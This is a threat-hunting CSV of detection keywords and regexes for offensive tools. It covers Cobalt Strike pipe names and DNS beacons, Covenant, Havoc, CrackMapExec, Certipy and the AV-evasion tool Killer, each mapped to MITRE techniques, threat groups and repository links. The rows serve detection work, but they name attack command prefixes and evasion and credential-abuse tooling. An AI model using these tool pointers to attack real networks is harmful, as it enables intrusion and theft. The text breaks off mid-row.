"\\mypipe-*","\\\\mypipe\-.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","#namedpipe","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A","63533"
"\\PGMessagePipe*","\\\\PGMessagePipe.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","#namedpipe","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A","63534"
"\\postex_*","\\\\postex_.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","#namedpipe","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A","63535"
"\\postex_ssh_*","\\\\postex_ssh_.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","#namedpipe","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A","63536"
"\\SearchTextHarvester*","\\\\SearchTextHarvester.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","#namedpipe","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A","63537"
"\\UIA_PIPE*","\\\\UIA_PIPE.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","#namedpipe","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A","63538"
"\\Winsock2\CatalogChangeListener-*","\\\\Winsock2\\CatalogChangeListener\-.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","#namedpipe","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A","63539"
"\Ladon *.exe*","\\Ladon\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","63540"
"afrog -*","afrog\s\-.{0,1000}","offensive_tool_keyword","afrog","A tool for finding vulnerabilities","T1083 - T1065 - T1204 - T1046","TA0007 - TA0005 - TA0001","N/A","N/A","Exploitation tool","https://github.com/zan8in/afrog","1","0","N/A","N/A","N/A","10","3791","414","2025-04-22T07:32:19Z","2022-02-24T06:00:32Z","63541"
"b84798b914f570f9b52bf3fe754c2559795aa6c3daa4c4344f4bce69f5f759d9","b84798b914f570f9b52bf3fe754c2559795aa6c3daa4c4344f4bce69f5f759d9","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","#filehash","N/A","10","9","804","128","2024-07-02T10:24:43Z","2023-04-08T16:29:52Z","63542"
"BypassUAC *","BypassUAC\s.{0,1000}","offensive_tool_keyword","covenant","Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","0","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","63543"
"c40e57334fa15d54a9c0ebeb4345e3e2e9f26ba044b5fe923625a9f66e55c360","c40e57334fa15d54a9c0ebeb4345e3e2e9f26ba044b5fe923625a9f66e55c360","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","#filehash","N/A","10","9","804","128","2024-07-02T10:24:43Z","2023-04-08T16:29:52Z","63544"
"cd PayGen","cd\sPayGen","offensive_tool_keyword","PayGen","FUD metasploit Persistence RAT","T1059.001 - T1209 - T1105 - T1547 - T1027","TA0003 - TA0005 - TA0002 - TA0011","N/A","N/A","Persistence","https://github.com/youhacker55/PayGen","1","0","N/A","N/A","N/A","1","4","0","2023-02-23T00:05:57Z","2021-06-16T20:20:55Z","63545"
"certipy *","certipy\s.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1552.003 - T1110.003 - T1550.004 - T1649","TA0006 - TA0008 - TA0003","N/A","Dispossessor","Exploitation tool","https://github.com/ly4k/Certipy","1","0","N/A","N/A","10","10","2704","380","2024-08-19T17:33:04Z","2021-10-06T23:02:40Z","63546"
"cme smb *","cme\ssmb\s.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","63547"
"cme smb -*","cme\ssmb\s\-.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Exploitation tool","https://github.com/byt3bl33d3r/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","63548"
"cme winrm *","cme\swinrm\s.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","63549"
"dcenum *","dcenum\s.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","63550"
"detect-hooks","detect\-hooks","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/anthemtotheego/Detect-Hooks","1","0","N/A","N/A","10","10","158","30","2021-07-22T20:13:16Z","2021-07-22T18:58:23Z","63551"
"doc.1a.*\.*","doc\.1a\..{0,50}\\\..{0,1000}","offensive_tool_keyword","cobaltstrike","dns beacons - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","#dnsquery","dns query field","10","10","N/A","N/A","N/A","N/A","63552"
"doc.4a.*\.*","doc\.4a\..{0,50}\\\..{0,1000}","offensive_tool_keyword","cobaltstrike","dns beacons - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","#dnsquery","dns query field","10","10","N/A","N/A","N/A","N/A","63553"
"doc.bc.*\.*","doc\.bc\..{0,50}\\\..{0,1000}","offensive_tool_keyword","cobaltstrike","dns beacons - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","#dnsquery","dns query field","10","10","N/A","N/A","N/A","N/A","63554"
"doc.md.*\.*","doc\.md\..{0,50}\\\..{0,1000}","offensive_tool_keyword","cobaltstrike","dns beacons - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - 